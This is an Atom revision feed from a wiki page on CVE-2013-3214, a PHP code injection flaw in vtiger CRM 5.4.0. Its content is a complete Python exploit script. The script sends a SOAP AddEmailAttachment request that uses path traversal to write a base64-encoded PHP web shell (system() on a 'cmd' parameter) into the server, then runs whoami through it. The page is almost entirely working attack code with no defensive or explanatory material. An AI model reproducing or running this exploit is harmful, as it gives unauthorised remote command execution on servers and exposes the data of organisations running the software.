<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2013-3214_vtiger_CRM_5.4.0_PHP%E4%BB%A3%E7%A2%BC%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2013-3214 vtiger CRM 5.4.0 PHP代碼注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2013-3214_vtiger_CRM_5.4.0_PHP%E4%BB%A3%E7%A2%BC%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2013-3214_vtiger_CRM_5.4.0_PHP%E4%BB%A3%E7%A2%BC%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-14T14:45:10Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2013-3214_vtiger_CRM_5.4.0_PHP%E4%BB%A3%E7%A2%BC%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1020&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/env python3  import requests from base64 import b64encode  # parameters depend on environment. host = '192.168.85.133' port = 8888 uri = '/'  url = f'...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2013-3214_vtiger_CRM_5.4.0_PHP%E4%BB%A3%E7%A2%BC%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1020&amp;oldid=prev"/>
		<updated>2021-04-06T02:49:13Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/env python3  import requests from base64 import b64encode  # parameters depend on environment. host = &amp;#039;192.168.85.133&amp;#039; port = 8888 uri = &amp;#039;/&amp;#039;  url = f&amp;#039;...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/env python3&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
from base64 import b64encode&lt;br /&gt;
&lt;br /&gt;
# parameters depend on environment.&lt;br /&gt;
host = '192.168.85.133'&lt;br /&gt;
port = 8888&lt;br /&gt;
uri = '/'&lt;br /&gt;
&lt;br /&gt;
url = f'http://{host}:{port}{uri}vtigerservice.php?service=outlook'&lt;br /&gt;
&lt;br /&gt;
headers = {'Content-Type': 'text/xml', 'charset': 'UTF-8'}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
payload = &amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
if(isset($_REQUEST['cmd'])){&lt;br /&gt;
        echo &amp;quot;&amp;lt;pre&amp;gt;&amp;quot;;&lt;br /&gt;
        $cmd = ($_REQUEST['cmd']);&lt;br /&gt;
        system($cmd);&lt;br /&gt;
        echo &amp;quot;&amp;lt;/pre&amp;gt;&amp;quot;;&lt;br /&gt;
        die;&lt;br /&gt;
}&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
encoded_payload = b64encode(payload.encode()).decode()&lt;br /&gt;
filename = &amp;quot;cmd.php&amp;quot;&lt;br /&gt;
&lt;br /&gt;
data = f&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;lt;soapenv:Envelope xmlns:crm=&amp;quot;http://www.vtiger.com/products/crm&amp;quot; xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:xsd=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot; xmlns:xsi=&amp;quot;http://www.w3.org/2001/XMLSchema-instance&amp;quot;&amp;gt;&lt;br /&gt;
	&amp;lt;soapenv:Header/&amp;gt;&lt;br /&gt;
	&amp;lt;soapenv:Body&amp;gt;&lt;br /&gt;
		&amp;lt;crm:AddEmailAttachment soapenv:encodingStyle=&amp;quot;http://schemas.xmlsoap.org/soap/encoding/&amp;quot;&amp;gt;&lt;br /&gt;
			&amp;lt;emailid xsi:type=&amp;quot;xsd:string&amp;quot;&amp;gt;ptFINT&amp;lt;/emailid&amp;gt;&lt;br /&gt;
			&amp;lt;filedata xsi:type=&amp;quot;xsd:string&amp;quot;&amp;gt;{encoded_payload}&amp;lt;/filedata&amp;gt;&lt;br /&gt;
			&amp;lt;filename xsi:type=&amp;quot;xsd:string&amp;quot;&amp;gt;../../../../../../{filename}&amp;lt;/filename&amp;gt;&lt;br /&gt;
			&amp;lt;filesize xsi:type=&amp;quot;xsd:string&amp;quot;&amp;gt;{len(payload)}&amp;lt;/filesize&amp;gt;&lt;br /&gt;
			&amp;lt;filetype xsi:type=&amp;quot;xsd:string&amp;quot;&amp;gt;php&amp;lt;/filetype&amp;gt;&lt;br /&gt;
			&amp;lt;username xsi:type=&amp;quot;xsd:string&amp;quot;&amp;gt;Pbghh&amp;lt;/username&amp;gt;&lt;br /&gt;
			&amp;lt;session xsi:type=&amp;quot;xsd:string&amp;quot;/&amp;gt;&lt;br /&gt;
		&amp;lt;/crm:AddEmailAttachment&amp;gt;&lt;br /&gt;
	&amp;lt;/soapenv:Body&amp;gt;&lt;br /&gt;
&amp;lt;/soapenv:Envelope&amp;gt;&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# send the requests&lt;br /&gt;
&lt;br /&gt;
print(&amp;quot;Sending ...&amp;quot;)&lt;br /&gt;
print(data)&lt;br /&gt;
requests.post(url, headers=headers, data=data)&lt;br /&gt;
&lt;br /&gt;
print(&amp;quot;Test command whoami ...&amp;quot;)&lt;br /&gt;
resp = requests.get(f'http://{host}:{port}{uri}{filename}?cmd=whoami')&lt;br /&gt;
&lt;br /&gt;
print(resp.text)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>